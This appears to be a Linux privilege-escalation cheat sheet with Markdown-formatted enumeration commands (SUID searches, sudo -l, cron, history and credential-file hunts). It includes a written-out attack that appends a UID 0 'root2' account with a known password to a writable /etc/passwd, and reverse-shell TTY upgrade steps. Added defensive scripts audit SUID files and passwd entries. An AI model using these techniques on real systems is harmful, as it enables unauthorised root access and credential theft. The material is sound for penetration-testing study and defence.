## TOP PRIORITY CHECKS
Check current user and privileges:
```bash title:"Current User"
whoami
```
```bash title:"User Privileges"
id
```
Check environment variables and PATH:
```bash
echo $PATH
env
```
Sudo Privileges:
```bash
sudo -l
```
Check Existing Users With Shell Available:
```bash
cat /etc/passwd | grep -vE '(nologin|false)'
```
> [!info]- Passwd File Description
> `joe:x:1000:1000:joe,,,:/home/joe:/bin/bash`
> - **Login Name**: "joe" - The username used for login.
> - **Encrypted Password**: "x" - This field traditionally holds the hashed password. The value _x_ means the hash is stored in **/etc/shadow** instead (more on that shortly).
> - **UID**: "1000" - Apart from the root user, which always has UID _0_, Linux starts numbering regular user IDs from 1000. This value is also called the _real user ID_.
> - **GID**: "1000" - The user's primary Group ID.
> - **Comment**: "joe,,," - The GECOS field, a free-form description of the user that often just repeats the username.
> - **Home Folder**: "/home/joe" - The directory the user is placed in upon login.
> - **Login Shell**: "/bin/bash" - The default interactive shell, if one exists.

Try these ways to get a `root` shell:
```bash
sudo -i
sudo su
su - root
```

Check Scheduled Tasks:
```bash title:"Check All Tasks"
ls -lah /etc/cron*
```
```bash title:"User Scheduled Jobs"
crontab -l
```
```bash title:"Root Scheduled Tasks"
sudo crontab -l
```

Check directories with WRITE privileges:
```bash
find / -writable -type d 2>/dev/null
```

Search for SUID-marked binaries:
```bash
find / -perm -u=s -type f 2>/dev/null
```
Search for SGID-marked binaries:
```bash
find / -perm -g=s -type f 2>/dev/null
```

Enumerate file capabilities (the full path is given first in case `getcap` is not in `PATH`):
```bash
/usr/sbin/getcap -r / 2>/dev/null
```
```bash
getcap -r / 2>/dev/null
```
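The defender's counterpart to the SUID/SGID searches above is to keep a baseline of privileged files and diff against it, so that a newly appearing setuid or setgid binary stands out. The following POSIX shell script is an added example, not part of the original notes; the function names `suid_inventory`, `suid_diff` and `demo_suid_audit` are this example's own, and the demo builds its own throwaway directory with constructed files rather than touching the real system.

```bash
#!/bin/sh
# Added example: baseline-and-diff audit of setuid/setgid files.
# Not part of the original notes; function names are this example's own.

# suid_inventory DIR
#   Prints a sorted list of regular files under DIR that carry the setuid
#   or setgid bit. Unreadable directories are silenced, as in the notes.
suid_inventory() {
    find "$1" -type f \( -perm -u=s -o -perm -g=s \) -print 2>/dev/null | sort
}

# suid_diff BASELINE DIR
#   Prints privileged files under DIR that are absent from BASELINE (a file
#   previously written by suid_inventory). Returns 1 when something new is
#   found, 0 when the current inventory matches the baseline.
suid_diff() {
    new=$(suid_inventory "$2" | comm -13 "$1" -)
    if [ -n "$new" ]; then
        printf '%s\n' "$new" | sed 's/^/NEW SUID\/SGID: /'
        return 1
    fi
    return 0
}

# demo_suid_audit
#   Self-contained demonstration on constructed files in a temp directory:
#   records a baseline with one setuid file, then marks a second file setgid
#   and checks that the diff reports it. Prints the basename of each newly
#   flagged file ("later" for this constructed layout).
demo_suid_audit() {
    dir=$(mktemp -d)
    touch "$dir/known" "$dir/later" "$dir/plain"
    chmod 4755 "$dir/known"                  # constructed: setuid from the start
    suid_inventory "$dir" > "$dir/baseline.txt"
    chmod 2755 "$dir/later"                  # constructed: setgid added afterwards
    result=$(suid_diff "$dir/baseline.txt" "$dir") || true
    rm -rf "$dir"
    printf '%s\n' "$result" | sed -n 's/^NEW SUID\/SGID: .*\///p'
}

# Run the demo with: sh this_script.sh --demo
if [ "${1:-}" = "--demo" ]; then
    demo_suid_audit
fi
```

On a real host you would run `suid_inventory / > /var/lib/suid-baseline.txt` once after provisioning and then `suid_diff /var/lib/suid-baseline.txt /` from cron or a monitoring job; a non-zero exit is the alert condition.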
## Network Related Checks
Network hostname:
```bash
hostname
```

Check network settings:
```bash title:"IP Config"
ip a
```
```bash title:"Network Routes Check"
routel
```
```bash title:"Current Open Connections"
ss -anp
```
```bash title:"iptables Rules"
cat /etc/iptables/rules.v4
```
## System Checks
Check current OS and Kernel versions:
```bash
cat /etc/issue
```
```bash
cat /etc/os-release
```
```bash
uname -a
```
Running processes:
```bash
ps aux
```
Installed packages etc.:
```bash title:"Installed Debian Packages"
dpkg -l
```
Check mounted systems and disks:
```bash
cat /etc/fstab
mount
lsblk
```
Check loaded Kernel modules:
```bash
lsmod
```
```bash title:"Check Info About Particular Kernel Mod"
/sbin/modinfo [MODULE_NAME]
```
```bash title:"Check Running Processes"
watch -n 1 "ps -aux | grep pass"
```

## Interesting Files Quick Search
```bash title:"Find All Accessible History Files"
find / -type f \( -name "*_hist" -o -name "*_history" \) -exec ls -l {} \; 2>/dev/null
```
```bash title:"Find world-writeable directories"
find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null
```
```bash title:"Find all hidden directories"
find / -type d -name ".*" -ls 2>/dev/null
```
```bash title:"Find all hidden files"
find / -type f -name ".*" -exec ls -l {} \; 2>/dev/null
```
```bash title:"Find world-writeable files"
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null
```
```bash title:"Enumerate binary files capabilities"
find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \;
```
```bash title:"Search config files"
find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null
```
```bash title:"Search .conf and .config files"
find / -type f \( -name "*.conf" -o -name "*.config" \) -exec ls -l {} \; 2>/dev/null
```
```bash title:"Find .sh scripts"
find / -type f -name "*.sh" 2>/dev/null | grep -v "src\|snap\|share"
```
```bash title:"Recursively grep file contents for a given word"
grep -r "word" /var
```
```bash title:"Find temporary files and opt folders"
ls -l /tmp /var/tmp /dev/shm /opt /var/opt
```

## Writable `passwd` file
Check with `ls -la /etc/passwd`.
Supposing you have write permissions, you can ***generate a password hash*** and use it to log in as `root` as follows:

1. Generate the password hash:
```bash
openssl passwd w00t
```
2. Append a new UID 0 entry carrying that hash to the passwd file:
```bash
echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd
```
3. Now you can log in as root using `su root2` and entering `w00t` as the password.
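The passwd field description earlier and the writable `passwd` technique just described both reduce to a few checks a defender can run on the file itself: is it world-writable, does any entry other than `root` carry UID 0, does any entry hold a hash inline instead of the shadowed `x`, and which accounts have an interactive shell. The POSIX shell script below is an added example, not part of the original notes; the function names (`uid0_aliases`, `inline_hashes`, `shell_users`, `is_world_writable`, `audit_passwd`) are this example's own, and `SAMPLE_PASSWD` is a constructed sample that includes a `root2` line of the kind shown above.

```bash
#!/bin/sh
# Added example: audit a passwd-format file for the conditions this
# checklist looks at. Not part of the original notes. The filter functions
# read passwd lines on stdin; the sample below is constructed, not captured.

# Constructed sample, including a "root2" UID 0 entry with an inline hash.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
joe:x:1000:1000:joe,,,:/home/joe:/bin/bash
root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash'

# uid0_aliases: names of entries with UID 0 that are not "root".
uid0_aliases() {
    awk -F: '$3 == "0" && $1 != "root" { print $1 }'
}

# inline_hashes: entries whose password field is neither the shadowed "x"
# nor a locked marker, i.e. a hash kept in passwd itself.
inline_hashes() {
    awk -F: '$2 != "x" && $2 != "*" && $2 != "!" && $2 != "!!" && $2 != "" { print $1 }'
}

# shell_users: entries with an interactive login shell, the same filter as
# the grep -vE '(nologin|false)' check at the top of the notes.
shell_users() {
    awk -F: '$7 != "" && $7 !~ /(nologin|false)$/ { print $1 }'
}

# is_world_writable FILE: succeeds when FILE has the other-write bit set.
is_world_writable() {
    [ -n "$(find "$1" -perm -o+w -print 2>/dev/null)" ]
}

# audit_passwd FILE: prints one finding per line; returns 1 if the file is
# world-writable or contains a UID 0 alias or an inline hash, else 0.
audit_passwd() {
    file="$1"
    bad=0
    if is_world_writable "$file"; then
        printf 'WORLD-WRITABLE %s\n' "$file"; bad=1
    fi
    for u in $(uid0_aliases < "$file"); do
        printf 'UID0-ALIAS %s\n' "$u"; bad=1
    done
    for u in $(inline_hashes < "$file"); do
        printf 'INLINE-HASH %s\n' "$u"; bad=1
    done
    for u in $(shell_users < "$file"); do
        printf 'SHELL %s\n' "$u"
    done
    return "$bad"
}

# demo_passwd_audit: writes the constructed sample to a temp file, audits
# it, and cleans up. Expected findings: UID0-ALIAS root2, INLINE-HASH root2.
demo_passwd_audit() {
    tmp=$(mktemp)
    printf '%s\n' "$SAMPLE_PASSWD" > "$tmp"
    audit_passwd "$tmp" || printf 'result: findings present\n'
    rm -f "$tmp"
}

# Run the demo with: sh this_script.sh --demo
if [ "${1:-}" = "--demo" ]; then
    demo_passwd_audit
fi
```

Against a live host, `audit_passwd /etc/passwd` is the call to make; any `WORLD-WRITABLE`, `UID0-ALIAS` or `INLINE-HASH` line is worth an immediate look, while the `SHELL` lines are informational and mirror the first check in this cheat sheet.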
## Shell Upgrade
Upgrade the shell via a Python call (depends on which Python binary is present):
```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
```
Upgrade to a fully interactive TTY:
```bash title:"In Kali"
stty raw -echo
fg
```
```bash title:"In Reverse Shell"
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>
```